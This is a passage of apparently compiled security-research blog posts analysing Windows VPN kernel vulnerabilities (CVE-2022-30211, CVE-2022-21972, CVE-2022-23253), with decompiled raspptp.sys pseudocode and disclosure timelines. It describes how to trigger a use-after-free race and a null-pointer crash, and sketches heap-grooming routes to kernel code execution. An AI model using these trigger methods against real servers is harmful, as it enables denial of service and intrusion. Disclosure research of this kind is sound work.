Exploitation of this bug outside of just exhausting the memory resources of a target server could take a very long time and I suspect would not realistically be exploitable or viable. Since a reference count can only happen once per UDP packet and each UDP message has to be large enough to contain all prior network stack frames and the required L2TP (and IPSEC) messages, the total required throughput is huge and would almost definitely be detected as a denial of service (DoS) attack long before reaching the required reference count.

Conclusion

This leaves the question of why would a developer allow a reference count to be handled in this way, when it should only ever require a minimum value of 0?

The main reason for allowing a reference count to become a negative number is to account or check for code that over removes references, and would typically result in an unsigned overflow. This kind of programming is a way of mitigating the risk posed by the more likely situation that a reference count is over-decremented. However, a direct result is that the opposite situation then becomes much more exploitable and in this scenario results in a potential for remote code execution (RCE).

Despite this, the mitigation is still generally effective, and the precursors for exploitation of this issue are unlikely to be realistically exploitable. In a way, the intended mitigation works because even though the maximum possible impact is far greater, the likelihood of exploitation is far lower.

Timeline

  • Vulnerability Reported To Microsoft – 20 April 2022
  • Vulnerability Acknowledged – 20 April 2022
  • Patch In Development – 23 June 2022
  • Patch Released – 12 July 2022

The post CVE-2022-30211: Windows L2TP VPN Memory Leak and Use after Free Vulnerability appeared first on Nettitude Labs.

CVE-2022-21972: Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 1)

10 May 2022 at 09:00

CVE-2022-21972 is a Windows VPN Use after Free (UaF) vulnerability that was discovered through reverse engineering the raspptp.sys kernel driver. The vulnerability is a race condition issue and can be reliably triggered through sending crafted input to a vulnerable server. The vulnerability can be be used to corrupt memory and could be used to gain kernel Remote Code Execution (RCE) or Local Privilege Escalation (LPE) on a target system.

Affected Versions

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 respectively. To see a full list of affected Windows versions check the official disclosure post on MSRC:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21972

The vulnerable code is present on both server and desktop distributions, however due to configuration differences, only the server deployment is exploitable.

Overview

This vulnerability is based heavily on how socket object life cycles are managed by the raspptp.sys driver. In order to understand the vulnerability we must first understand some of the basics in the kernel driver interacts with sockets to implement network functionality.

Sockets In The Windows Kernel – Winsock Kernel (WSK)

WSK is the name of the Windows socket API that can be used by drivers to create and use sockets directly from the kernel. Head over to https://docs.microsoft.com/en-us/windows-hardware/drivers/network/winsock-kernel-overview to see an overview of the system.

The way in which the WSK API is usually used is through a set of event driven call back functions. Effectively, once a socket is set up, an application can provide a dispatch table containing a set of function pointers to be called for socket related events. In order for an application to be able to maintain its own state through these callbacks, a context structure is also provided by the driver to be given to each callback so that state can be tracked for the connection throughout its life-cycle.

raspptp.sys and WSK

Now that we understand the basics of how sockets are interacted with in the kernel, let’s look at how the raspptp.sys driver uses WSK to implement the PPTP protocol.

The PPTP protocol specifies two socket connections; a TCP socket used for managing a VPN connection and a GRE (Generic Routing Encapsulation) socket used for sending and receiving the VPN network data. The TCP socket is the only one we care about for triggering this issue, so lets break down the life cycle of how raspptp.sys handles these connections with WSK

  1. A new listening socket is created by the WskOpenSocket function in raspptp.sys.  This function is passed a WSK_CLIENT_LISTEN_DISPATCH dispatch table with the WskConnAcceptEvent function specified as the WskAcceptEven handler. This is the callback that handles a socket accept event, aka new incoming connection.
  2. When a new client connects to the server the WskConnAcceptEvent function is called.  This function allocates a new context structure for the new client socket and registers a WSK_CLIENT_CONNECTION_DISPATCH dispatch table with all event callback functions specified. These are WskConnReceiveEvent, WskConnDisconnectEvent and WskConnSendBacklogEvent for receive, disconnect and send events respectively.
  3. Once the accept event is fully resolved, WskAcceptCompletion is called and a callback is triggered (CtlConnectQueryCallback) which completes initialisation of the PPTP Control connection and creates a context structure specifically for tracking the state of the clients PPTP control connection. This is the main object which we care about for this vulnerability.

The PPTP Control connection context structure is allocated by the CtlAlloc function. Some abbreviated pseudo code for this function is:

PptpCtlCtx *__fastcall CtlAlloc(PptpAdapterContext *AdapterCtx)
{
    PptpAdapterContext *lpPptpAdapterCtx;
    PptpCtlCtx *PptpCtlCtx;
    PptpCtlCtx *lpPptpCtlCtx;
    NDIS_HANDLE lpNDISMiniportHandle;
    PDEVICE_OBJECT v6;
    __int64 v7;
    NDIS_HANDLE lpNDISMiniportHandle_1;
    NDIS_HANDLE lpNDISMiniportHandle_2;
    struct _NDIS_TIMER_CHARACTERISTICS TimerCharacteristics;

    lpPptpAdapterCtx = AdapterCtx;
    PptpCtlCtx = (PptpCtlCtx *)MyMemAlloc(0x290ui64, 'TPTP'); // Actual name of the allocator function in the raspptp.sys code
    lpPptpCtlCtx = PptpCtlCtx;
    if ( PptpCtlCtx )
    {
        memset(PptpCtlCtx, 0, 0x290ui64);
        ReferenceAdapter(lpPptpAdapterCtx);
        lpPptpCtlCtx->AllocTagPTPT = 'TPTP';
        lpPptpCtlCtx->CtlMessageTypeToLength = (unsigned int *)&PptpCtlMessageTypeToSizeArray;
        lpPptpCtlCtx->pPptpAdapterCtx = lpPptpAdapterCtx;
        KeInitializeSpinLock(&lpPptpCtlCtx->CtlSpinLock);
        lpPptpCtlCtx->CtlPptpWanEndpointsEntry.Blink = &lpPptpCtlCtx->CtlPptpWanEndpointsEntry;
        lpPptpCtlCtx->CtlCallDoubleLinkedList.Blink = &lpPptpCtlCtx->CtlCallDoubleLinkedList;
        lpPptpCtlCtx->CtlCallDoubleLinkedList.Flink = &lpPptpCtlCtx->CtlCallDoubleLinkedList;
        lpPptpCtlCtx->CtlPptpWanEndpointsEntry.Flink = &lpPptpCtlCtx->CtlPptpWanEndpointsEntry;
        lpPptpCtlCtx->CtlPacketDoublyLinkedList.Blink = &lpPptpCtlCtx->CtlPacketDoublyLinkedList;
        lpPptpCtlCtx->CtlPacketDoublyLinkedList.Flink = &lpPptpCtlCtx->CtlPacketDoublyLinkedList;
        lpNDISMiniportHandle = lpPptpAdapterCtx->MiniportNdisHandle;
        TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpEchoTimeout;
        *(_DWORD *)&TimerCharacteristics.Header.Type = 0x180197;
        TimerCharacteristics.AllocationTag = 'TMTP';
        TimerCharacteristics.FunctionContext = lpPptpCtlCtx;
        if ( NdisAllocateTimerObject(
            lpNDISMiniportHandle,
            &TimerCharacteristics,
            &lpPptpCtlCtx->CtlEchoTimeoutNdisTimerHandle) )
        {
        ...
        }
        else
        {
            lpNDISMiniportHandle_1 = lpPptpAdapterCtx->MiniportNdisHandle;
            TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpWaitTimeout;
            if ( NdisAllocateTimerObject(
            lpNDISMiniportHandle_1,
            &TimerCharacteristics,
            &lpPptpCtlCtx->CtlWaitTimeoutNdisTimerHandle) )
            {
                ...
            }
            else
            {
                lpNDISMiniportHandle_2 = lpPptpAdapterCtx->MiniportNdisHandle;
                TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpStopTimeout;
                if ( !NdisAllocateTimerObject(
                lpNDISMiniportHandle_2,
                &TimerCharacteristics,
                &lpPptpCtlCtx->CtlStopTimeoutNdisTimerHandle) )
                {
                    KeInitializeEvent(&lpPptpCtlCtx->CtlWaitTimeoutTriggered, NotificationEvent, 1u);
                    KeInitializeEvent(&lpPptpCtlCtx->CtlWaitTimeoutCancled, NotificationEvent, 1u);
                    lpPptpCtlCtx->CtlCtxReferenceCount = 1;// Set reference count to an initial value of one
                    lpPptpCtlCtx->fpCtlCtxFreeFn = (__int64)CtlFree;
                    ExInterlockedInsertTailList(
                    (PLIST_ENTRY)&lpPptpAdapterCtx->PptpWanEndpointsFlink,
                    &lpPptpCtlCtx->CtlPptpWanEndpointsEntry,
                    &lpPptpAdapterCtx->PptpAdapterSpinLock);
                    return lpPptpCtlCtx;
                }
                ...
            }
        }
        ...
    }
    if...
        return 0i64;
}

The important parts of this structure to note are the CtlCtxReferenceCount and CtlWaitTimeoutNdisTimerHandle structure members. This new context structure is stored on the socket context for the new client socket and can then be referenced for all of the events relating to the socket it binds to.

The only section of the socket context structure that we then care about are the following fields:

00000008 ContextPtr dq ? ; PptpCtlCtx
00000010 ContextRecvCallback dq ? ; CtlReceiveCallback
00000018 ContextDisconnectCallback dq ? ; CtlDisconnectCallback
00000020 ContextConnectQueryCallback dq ? ; CtlConnectQueryCallback
  • PptpCtlCtx – The PPTP specific context structure for the control connection.
  • CtlReceiveCallback – The PPTP control connection receive callback.
  • CtlDisconnectCallback – The PPTP control connection disconnect callback.
  • CtlConnectQueryCallback – The PPTP control connection query (used to get client information on a new connection being complete) callback.

raspptp.sys Object Life Cycles

The final bit of background information we need to understand before we delve into the vulnerability is the way that raspptp keeps these context structures alive for a given socket. In the case of the PptpCtlCtx structure, both the client socket and the PptpCtlCtx structure have a reference count.

This reference count is intended to be incremented every time a reference to either object is created. These are initially set to 1 and when decremented to 0 the objects are freed by calling a free callback stored within each structure. This obviously only works if the code remembers to increment and decrement the reference counts properly and correctly lock access across multiple threads when handling the respective structures.

Within raspptp.sys, the code that performs the reference increment and de-increment functionality usually looks like this:

// Increment code
_InterlockedIncrement(&Ctx->ReferenceCount);

// Decrement Code
if ( _InterlockedExchangeAdd(&Ctx->ReferenceCount, 0xFFFFFFFF) == 1 )
    ((void (__fastcall *)(CtxType *))Ctx->fpFreeHandler)(Ctx);

As you may have guessed at this point, the vulnerability we’re looking at is indeed due to incorrect handling of these reference counts and their respective locks, so now that we have covered the background stuff let’s jump into the juicy details!

The Vulnerability

The first part of our use after free vulnerability is in the code that handles receiving PPTP control data for a client connection. When new data is received by raspptp.sys the WSK layer will dispatch a call the the appropriate event callback. raspptp.sys registers a generic callback for all sockets called ReceiveData. This function parses the incoming data structures from WSK and forwards on the incoming data to the client sockets contexts own receive data call back. For a PPTP control connection, this callback is the CtlReceiveCallback function.

The section of the ReceiveData function that calls this callback has the following pseudo code. This snippet includes all the locking and reference increments that are used to protect the code against multi threaded access issues…

_InterlockedIncrement(&ClientCtx->ConnectionContextRefernceCount);
((void (__fastcall *)(PptpCtlCtx *, PptpCtlInputBufferCtx *, _NET_BUFFER_LIST *))ClientCtx->ContextRecvCallback)(
ClientCtx->ContextPtr,
lpCtlBufferCtx,
NdisNetBuffer);

the CtlReceiveCallback function has the following pseudo code:

__int64 __fastcall CtlReceiveCallback(PptpCtlCtx *PptpCtlCtx, PptpCtlInputBufferCtx *PptpBufferCtx, _NET_BUFFER_LIST *InputBufferList)
{
    PptpCtlCtx *lpPptpCtlCx;
    PNET_BUFFER lpInputFirstNetBuffer;
    _NET_BUFFER_LIST *lpInputBufferList;
    ULONG NetBufferLength;
    PVOID NetDataBuffer;

    lpPptpCtlCx = PptpCtlCtx;
    lpInputFirstNetBuffer = InputBufferList->FirstNetBuffer;
    lpInputBufferList = InputBufferList;
    NetBufferLength = lpInputFirstNetBuffer->DataLength;
    NetDataBuffer = NdisGetDataBuffer(lpInputFirstNetBuffer, lpInputFirstNetBuffer->DataLength, 0i64, 1u, 0);
    if ( NetDataBuffer )
        CtlpEngine(lpPptpCtlCx, (uchar *)NetDataBuffer, NetBufferLength);
        ReceiveDataComplete(lpPptpCtlCx->CtlWskClientSocketCtx, lpInputBufferList);
        return 0i64;
}

The CtlpEngine function is the state machine responsible for parsing the incoming PPTP control data. Now there is one very important piece of code that is missing from these two sections and that is any form of reference count increment or locking for the PptpCtlCtx object!

Neither of the callback handlers actually increment the reference count for the PptpCtlCtx or attempt to lock access to signify that it is in use; this is potentially a vulnerability because if at any point the reference count was to be decremented then the object would be freed! However, if this is so bad, why isnt every PPTP server just crashing all the time? The answer to this question is that the CtlpEngine function actually uses the reference count correctly.

This is where things get confusing. Assuming that the raspptp.sys driver was completely single threaded, this implementation would be 100% safe as no part of the receive pipeline for the control connection decrements the object reference count without first performing an increment to account for it. In reality however, raspptp.sys is not a single threaded driver. Looking back at the initialization of the PptpCtlCtx object, there is one part of particular interest.

TimerCharacteristics.FunctionContext = PptpCtlCtx;
TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpWaitTimeout;
if ( NdisAllocateTimerObject(
    lpNDISMiniportHandle_1,
    &TimerCharacteristics,
    &lpPptpCtlCtx->CtlWaitTimeoutNdisTimerHandle) )

Here we can see the allocation of an Ndis timer object. The actual implementation of these timers isn’t important, but what is important is that these timers dispatch there callbacks on a separate thread to that of which WSK dispatches the ReceiveData callback. Another interesting point is that both use the PptpCtlCtx structure as their context structure.

So what does this timer callback do and when does it happen? The code that sets the timer is as follows:

NdisSetTimerObject(newClientCtlCtx->CtlWaitTimeoutNdisTimerHandle, (LARGE_INTEGER)-300000000i64, 0, 0i64);// 30 second timeout timer

We can see that a 30 second timer trigger is set and when this 30 seconds is up, the CtlpWaitTimeout callback is called. This 30 second timer can be canceled but this is only done when a client performs a PPTP control handshake with the server, so assuming we never send a valid handshake after 30 seconds the callback will be dispatched. But what does this do?

The CtlpWaitTimeout function is used to handle the timer callback and it has the following pseudo code:

LONG __fastcall CtlpWaitTimeout(PVOID Handle, PptpCtlCtx *Context)
{
    PptpCtlCtx *lpCtlTimeoutEvent;

    lpCtlTimeoutEvent = Context;
    CtlpDeathTimeout(Context);
    return KeSetEvent(&lpCtlTimeoutEvent->CtlWaitTimeoutTriggered, 0, 0);
}

As we can see the function mainly serves to call the eerily named CtlpDeathTimeout function, which has the following pseudo code:

void __fastcall CtlpDeathTimeout(PptpCtlCtx *CtlCtx)
{
    PptpCtlCtx *lpCtlCtx;
    __int64 Unkown;
    CHAR *v3;
    char SockAddrString;

    lpCtlCtx = CtlCtx;
    memset(&SockAddrString, 0, 65ui64);
    if...
        CtlSetState(lpCtlCtx, CtlStateUnknown, Unkown, 0);
        CtlCleanup(lpCtlCtx, 0);
}

This is where things get even more interesting. The CtlCleanup function is the function responsible for starting the process of tearing down the PPTP control connection. This is done in two steps. First, the state of the Control connection is set to CtlStateUnknown which means that the CtlpEngine function will be prevented from processing any further control connection data (kind of). The second step is to push a task to run the similarly named CtlpCleanup function onto a background worker thread which belongs to the raspptp.sys driver.

The end of the CtlpCleanup function contains the following code that will be very useful for us being able to trigger a use after free as it will always run on a different thread to the CtlpEngine function.

result = (unsigned int)_InterlockedExchangeAdd(&lpCtlCtxToCleanup->CtlCtxReferenceCount, 0xFFFFFFFF);
if ( (_DWORD)result == 1 )
    result = ((__int64 (__fastcall *)(PptpCtlCtx *))lpCtlCtxToCleanup->fpCtlCtxFreeFn)(lpCtlCtxToCleanup);

It decrements the reference count on the PptpCtlCtx object and even better is that no part of this timeout pipeline increments the reference count in a way that would prevent the free function from being called!

So, theoretically, all we need to do is find some way of getting the CtlpCleanup and CtlpEngine function to run at the same time on seperate threads and we will be able to cause a Use after Free!

However, before we celebrate too early, we should take a look at the function that actually frees the PptpCtlCtx function because it is yet another callback. The fpCtlCtxFreeFn property is a callback function pointer to the CtlFree function. This function does a decent amount of tear down as well but the bits we care about are the following lines

WskCloseSocketContextAndFreeSocket(CtlWskContext);/
lpCtlCtxToFree->CtlWskClientSocketCtx = 0i64;
...
ExFreePoolWithTag(lpCtlCtxToFree, 0);

Now there is more added complication in this code that is going to make things a little more difficult. The call to WskCloseSocketContextAndFreeSocket actually closes the client socket before freeing the PptpCtlCtx structure. This means that at the point the PptpCtlCtx structure is freed, we will no longer be able to send new data to the socket and trigger any more calls into CtlpEngine. However, this doesn’t mean that we can’t trigger the vulnerability, since if data is already being processed by CtlpEngine when the socket is closed we simply need to hope the thread stays in the function long enough for the free to occur in CtlFree and boom – we have a UAF.

Now that we have a good old fashioned kernel race condition, let’s take a look at how we can try to trigger it!

The Race Condition

Like any good race condition, this one contains a lot of moving parts and added complication which make triggering it a non trivial task, but it’s still possible! Let’s take a look at what we need to happen.

  1. 30 second timeout is triggered and eventually runs CtlCleanup, pushing a CtlpCleanup task onto a background worker thread queue.
  2. Background worker thread wakes up and starts processing the CtlpCleanup task from its task queue.
  3. CtlpEngine starts or is currently processing data on a WSK dispatch thread when the CtlpCleanup function frees the underlying PptpCtlCtx structure from the worker thread!
  4. Bad things happen…

Triggering the Race Condition

The main parts of this race condition to consider are what are the limits on the data can we send to the server to spend as much time as possible in CtlpEngine parsing loop and can we do this without cancelling the timeout?

Thankfully as previously mentioned the only way to cancel the timeout is to perform a PPTP control connection handshake, which technically means we can get the CtlpEngine function to process any other part of the control connection, as long as we don’t start the handshake. However the state machine within CtlpEngine needs the handshake to take place to enable any other part of the control connection!

There is one part of the CtlpEngine state machine that can still be partially validly hit (without triggering an error) before the handshake has taken place. This is the EchoRequest control message type. Now we can’t actually enter the proper handling of the message type before the handshake has taken place but what we can do is use it to iterate through all the sent data in the parsing loop without triggering a parsing error. This effectively forms a way of us spinning inside the CtlpEngine function without cancelling the timeout which is exactly what we want. Even better is that this remains true when the CtlStateUnknown state is set by the CtlCleanup function.

Unfortunately the maximum amount of data we can process in one WSK receive data event callback trigger is limited to the maximum data that can be received in one TCP packet. In theory this is 65,535 bytes but due to the size limitation of Ethernet frames to 1,500 bytes we can only send ~1,450 bytes (1,500 minus the headers of the other network layer frames) of PPTP control messages in a single request. This works out at around 90 EchoRequest messages per callback event trigger. For a modern CPU this is not a lot to churn through before hopping out of the CtlpEngine function.

Another thing to consider is how do we know if the race condition was successful or a failure? Thankfully in this regard the server socket being closed on timeout works in our favour as this will cause a socket exception on the client if we attempt to send any more data once the server closes the socket. Once the socket is closed we know that the race is finished but we don’t necessarily know if we did or didn’t win the race.

With these considerations in place, how do we trigger the vulnerability? It actually becomes a simple proof of concept. Effectively we just continually send EchoRequest PPTP control frames in 90 frame bursts to a server until the timeout event occurs and then we hope that we’ve won the race.

We won’t be releasing the PoC code until people have had a chance to patch things up but when the PoC is successful we may see something like this on our target server:

Because the PptpCtlCtx structure is de-initialised there are a lot of pointers and properties that contain invalid values that, if used at different parts of the Receive Event handling code, will cause crashes in non fun ways like Null pointer deference’s. This is actually what happened in the Blue Screen of Death above, but the CtlpEngine function did still process a freed PptpCtlCtx structure.

Can we use this vulnerability for anything more than a simple BSOD?

Exploitation

Due to the state of mitigation in the Windows kernel against memory corruption exploits and the difficult nature of this race condition, achieving useful exploitation of the vulnerability is not going to be easy, especially if seeking to obtain Remote Code Execution (RCE). However, this does not mean it is not possible to do so.

Exploitability – The Freed Memory

In order to asses the exploitability of the vulnerability, we need to look at what our freed memory contains and where about it is in the Windows kernel heap. In windbg we can use the !pool command to get some information on the allocated chunk that will be freed in our UaF issue.

ffff828b17e50d20 size: 2a0 previous size: 0 (Allocated) *PTPT

We can see here that the size of the freed memory block is 0x2a0 or 672 bytes. This is important as it puts us in the allocation size range for the variable size kernel heap segment. This heap segment is fairly nice for use after free exploitation as the variable size heap also maintains a free list of chunks that have been freed and their sizes. When a new chunk is allocated this free list is searched and if a chunk of an exact or greater size match is found it will be used for the new allocation. Since this is the kernel, any other part of the kernel that allocates non paged pool memory allocations of this or a similar size could end up using this freed slot as well.

So, what do we need in order to start exploiting this issue? ideally we want to find some allocated object in the kernel that we can control the contents of and allocate at 0x2a0 bytes in size. This would allow us to create a fake PptpCtlCtx object, which we can then use to control the CtlpEngine state machine code. Finding an exact size match allocation isn’t the only way we could groom the heap for a potential exploit but it would certainly be the most reliable method.

If we can take control of a PptpCtlCtx object what can we do? One of the most powerful bits of this vulnerability from an exploit development perspective are the callback functions located inside the PptpCtlCtx structure. Usually a mitigation called Control Flow Guard (CFG) or Xtended Flow Guard (XFG) would prevent us from being able to corrupt and use these callback pointers with an arbitrary executable kernel address. However CFG and XFG are not enabled for the raspptp.sys driver (as of writing this blog) meaning we can point execution to any instruction located in the kernel. This gives us plenty of things to abuse for exploitation purposes. A caveat to this is that we are limited to the number of these gadgets we can use in one trigger of the vulnerability, meaning we would likely need to trigger the vulnerability multiple times with different gadgets to achieve a full exploit or at least that’s the case on a modern Windows kernel.

Exploitability – Threads

Allocating an object to fill our freed slot and take control of kernel execution through a fake PptpCtlCtx object sounds great, but one additional restriction on the way in which we do this is that we only have access to CtlpEngine using the freed object for a short period of CPU time. We can’t use the same thread that is processing the CtlpEngine to allocate objects to fill the empty slot, and if we do it would be after the thread has returned from CtlpEngine. At this point the vulnerability will no longer be exploitable.

What this means is that we would need the fake object allocations to be happening in a separate thread in the hope that we can get one of our fake objects allocated and populated with our fake object contents while the vulnerable kernel thread is still in CtlpEngine, allowing us to then start doing bad things with the state machine. All of this sounds like a lot to try and get done in relatively small CPU windows, but it is possible that it could be achieved. The issue with any exploit attempting to do this is going to be reliability, since there is a fairly high chance a failed exploit would crash the target machine and retrying the exploit would be a slow and easily detectable process.

Exploitability – Local Privilege Escalation vs Remote Code Execution

The ability to exploit this issue for LPE is much more likely to be successful over the affected Windows kernel versions than exploiting it for RCE. This is largely due to the fact that an RCE exploit will need to be able to first leak information about the kernel using either this vulnerability or another one before any of the potential callback corruption uses would be viable. There are also far fewer parts of the kernel accessible remotely, meaning finding a way of spraying a fake PptpCtlCtx object into the kernel heap remotely is going to be significantly harder to achieve.

Another reason that LPE is a much more viable exploit route is that the localhost socket or 127.0.0.1 allows for far more data than the ethernet frame capped 1,500 bytes we get remotely, to be processed by each WSK Receive event callback. This significantly increases most of the variables for achieving successful exploitation!

Conclusion

Wormable Kernel Remote Code Execution vulnerabilities are the holy grail of severity in modern operating systems. With great power however comes great responsibility. While this vulnerability could be catastrophic in its impact ,the skill to pull off a successful and undetected exploit is not to be underestimated. Memory corruption continues to become a harder and harder art form to master, however there are definitely those out there with the ability and determination to achieve the full potential of this vulnerability. For these reasons CVE-2022-21972 is a vulnerability that represents a very real threat to internet connected Microsoft based VPN infrastructure. We recommend that this vulnerability is patched with priority in all environments.

Timeline

  • Vulnerability Reported To Microsoft – 29 Oct 2021
  • Vulnerability Acknowledged – 29 Oct 2021
  • Vulnerability Confirmed – 11 November 2021
  • Patch Release Date Confirmed – 12 November 2021
  • Patch Release – 10 May 2022

The post CVE-2022-21972: Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 1) appeared first on Nettitude Labs.

CVE-2022-23253 – Windows VPN Remote Kernel Null Pointer Dereference

22 March 2022 at 09:00

CVE-2022-23253 is a Windows VPN (remote access service) denial of service vulnerability that Nettitude discovered while fuzzing the Windows Server Point-to-Point Tunnelling Protocol (PPTP) driver. The implications of this vulnerability are that it could be used to launch a persistent Denial of Service attack against a target server. The vulnerability requires no authentication to exploit and affects all default configurations of Windows Server VPN.

Nettitude has followed a coordinated disclosure process and reported the vulnerability to Microsoft. As a result the latest versions of MS Windows are now patched and no longer vulnerable to the issue.

Affected Versions of Microsoft Windows Server

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 respectively. To see a full list of affected windows versions check the official disclosure post on MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23253.

Overview

PPTP is a VPN protocol used to multiplex and forward virtual network data between a client and VPN server. The protocol has two parts, a TCP control connection and a GRE data connection. The TCP control connection is mainly responsible for the configuring of buffering and multiplexing for network data between the client and server. In order to talk to the control connection of a PPTP server, we only need to connect to the listening socket and initiate the protocol handshake. After that we are able to start a complete PPTP session with the server.

When fuzzing for vulnerabilities the first step is usually a case of waiting patiently for a crash to occur. In the case of fuzzing the PPTP implementation we had to wait a mere three minutes before our first reproducible crash!

Our first step was to analyse the crashing test case and minimise it to create a reliable proof of concept. However before we dissect the test case we need to understand what a few key parts of the control connection logic are trying to do!

The PPTP Handshake

PPTP implements a very simple control connection handshake procedure. All that is required is that a client first sends a StartControlConnectionRequest to the server and then receives a StartControlConnectionReply indicating that there were no issues and the control connection is ready to start processing commands. The actual contents of the StartControlConnectionRequest has no effect on the test case and just needs to be validly formed in order for the server to progress the connection state into being able to process the rest of the defined control connection frames. If you’re interested in what all these control packet frames are supposed to do or contain you can find details in the PPTP RFC (https://datatracker.ietf.org/doc/html/rfc2637).

PPTP IncomingCall Setup Procedure

In order to forward some network data to a PPTP VPN server the control connection needs to establish a virtual call with the server. There are two types of virtual call when communicating with a PPTP server, these are outgoing calls and incoming calls. To to communicate with a VPN server from a client we typically use the incoming call variety. Finally, to set up an incoming call from a client to a server, three control message types are used.

  • IncomingCallRequest – Used by the client to request a new incoming virtual call.
  • IncomingCallReply – Used by the server to indicate whether the virtual call is being accepted. It also sets up call ID’s for tracking the call (these ID’s are then used for multiplexing network data as well).
  • IncomingCallConnected – Used by the client to confirm connection of the virtual call and causes the server to fully initialise it ready for network data.

The most important bit of information exchanged during call setup is the call ID. This is the ID used by the client and server to send and receive data along that particular call. Once a call is set up data can then be sent to the GRE part of the PPTP connection using the call ID to identify the virtual call connection it belongs to.

The Test Case

After reducing the test case, we can see that at a high level the control message exchanges that cause the server to crash are as follows:

StartControlConnectionRequest() Client -> Server
StartControlConnectionReply() Server -> Client
IncomingCallRequest() Client -> Server
IncomingCallReply() Server -> Client
IncomingCallConnected() Client -> Server
IncomingCallConnected() Client -> Server

The test case appears to initially be very simple and actually mostly resembles what we would expect for a valid PPTP connection. The difference is the second IncomingCallConnected message. For some reason, upon receiving an IncomingCallConnected control message for a call ID that is already connected, a null pointer dereference is triggered causing a system crash to occur.

Let’s look at the crash and see if we can see why this relatively simple error causes such a large issue.

The Crash

Looking at the stack trace for the crash we get the following:

... <- (Windows Bug check handling)
NDIS!NdisMCmActivateVc+0x2d
raspptp!CallEventCallInConnect+0x71
raspptp!CtlpEngine+0xe63
raspptp!CtlReceiveCallback+0x4b
... <- (TCP/IP Handling)

What’s interesting here is that we can see that the crash does not not take place in the raspptp.sys driver at all, but instead occurs in the ndis.sys driver. What is ndis.sys? Well, raspptp.sys in what is referred to as a mini-port driver, which means that it only actually implements a small part of the functionality required to implement an entire VPN interface and the rest of the VPN handling is actually performed by the NDIS driver system. raspptp.sys acts as a front end parser for PPTP which then forwards on the encapsulated virtual network frames to NDIS to be routed and handled by the rest of the Windows VPN back-end.

So why is this null pointer dereference happening? Let’s look at the code to see if we can glean any more detail.

The Code

The first section of code is in the PPTP control connection state machine. The first part of this handling is a small stub in a switch statement for handling the different control messages. For an IncomingCallConnected message, we can see that all the code initially does is check that a valid call ID and context structure exists on the server. If they do exist, a call is made to the CallEventCallInConnect function with the message payload and the call context structure.

case IncomingCallConnected:
    // Ensure the client has sent a valid StartControlConnectionRequest message
    if ( lpPptpCtlCx->CtlCurrentState == CtlStateWaitStop )
    {
        // BigEndian To LittleEndian Conversion
        CallIdSentInReply = (unsigned __int16)__ROR2__(lpCtlPayloadBuffer->IncomingCallConnected.PeersCallId, 8);
        if ( PptpClientSide ) // If we are the client
            CallIdSentInReply &= 0x3FFFu; // Maximum ID mask
            // Get the context structure for this call ID if it exists
            IncomingCallCallCtx = CallGetCall(lpPptpCtlCx->pPptpAdapterCtx, CallIdSentInReply);
            // Handle the incoming call connected event
            if ( IncomingCallCallCtx )
                CallEventCallInConnect(IncomingCallCallCtx, lpCtlPayloadBuffer);

The CallEventCallInConnect function performs two tasks; it activates the virtual call connection through a call to NdisMCmActivateVc and then if the returned status from that function is not STATUS_PENDING it calls the PptpCmActivateVcComplete function.

__int64 __fastcall CallEventCallInConnect(CtlCall *IncomingCallCallCtx, CtlMsgStructs *IncomingCallMsg)
{
    unsigned int ActiveateVcRetCode;
    ...
ActiveateVcRetCode = NdisMCmActivateVc(lpCallCtx->NdisVcHandle, (PCO_CALL_PARAMETERS)lpCallCtx->CallParams);
if ( ActiveateVcRetCode != STATUS_PENDING )
{
    if...
        PptpCmActivateVcComplete(ActiveateVcRetCode, lpCallCtx, (PVOID)lpCallCtx->CallParams);
    }
return 0i64;
}

...

NDIS_STATUS __stdcall NdisMCmActivateVc(NDIS_HANDLE NdisVcHandle, PCO_CALL_PARAMETERS CallParameters)
{
    __int64 v2; // rbx
    PCO_CALL_PARAMETERS lpCallParameters; // rdi
    KIRQL OldIRQL; // al
    _CO_MEDIA_PARAMETERS *lpMediaParameters; // rcx
    __int64 v6; // rcx

    v2 = *((_QWORD *)NdisVcHandle + 9);
    lpCallParameters = CallParameters;
    OldIRQL = KeAcquireSpinLockRaiseToDpc((PKSPIN_LOCK)(v2 + 8));
    *(_DWORD *)(v2 + 4) |= 1u;
    lpMediaParameters = lpCallParameters->MediaParameters;
    if ( lpMediaParameters->MediaSpecific.Length < 8 )
        v6 = (unsigned int)v2;
    else
        v6 = *(_QWORD *)lpMediaParameters->MediaSpecific.Parameters;
        *(_QWORD *)(v2 + 136) = v6;
        *(_QWORD *)(v2 + 136) = *(_QWORD *)lpCallParameters->MediaParameters->MediaSpecific.Parameters;
        KeReleaseSpinLock((PKSPIN_LOCK)(v2 + 8), OldIRQL);
    return 0;
}

We can see that in reality, the NdisMCMActivateVc function is surprisingly simple. We know that it always returns 0 so there will always be a proceeding call to PptpCmActivateVcComplete by the CallEventCallInConnect function.

Looking at the stack trace we know that the crash is occurring at an offset of 0x2d into the NdisMCmActivateVc function which corresponds to the following line in our pseudo code:

lpMediaParameters = lpCallParameters->MediaParameters;

Since NdisMCmActivateVc doesn’t sit in our main target driver, raspptp.sys, it’s mostly un-reverse engineered, but it’s pretty clear to see that the main purpose is to set some properties on a structure which is tracked as the handle to NDIS from raspptp.sys. Since this doesn’t really seem like it’s directly causing the issue we can safely ignore it for now. The particular variable lpCallParameters (also the CallParameters argument) is causing the null pointer dereference and is passed into the function by raspptp.sys; this indicates that the vulnerability must be occurring somewhere else in the raspptp.sys driver code.

Referring back to the call from CallEventCallInConnect we know that the CallParmaters argument is actually a pointer stored within the Call Context structure in raspptp.sys. We can assume that at some point in the call to PptpCmActivateVcComplete this structure is freed and the pointer member of the structure is set to zero. So lets find the responsible line!

void __fastcall PptpCmActivateVcComplete(unsigned int OutGoingCallReplyStatusCode, CtlCall *CallContext, PVOID CallParams)
{
    CtlCall *lpCallContext; // rdi
    ...
if ( lpCallContext->UnkownFlag )
{
    if ( lpCallParams )
        ExFreePoolWithTag((PVOID)lpCallContext->CallParams, 0);
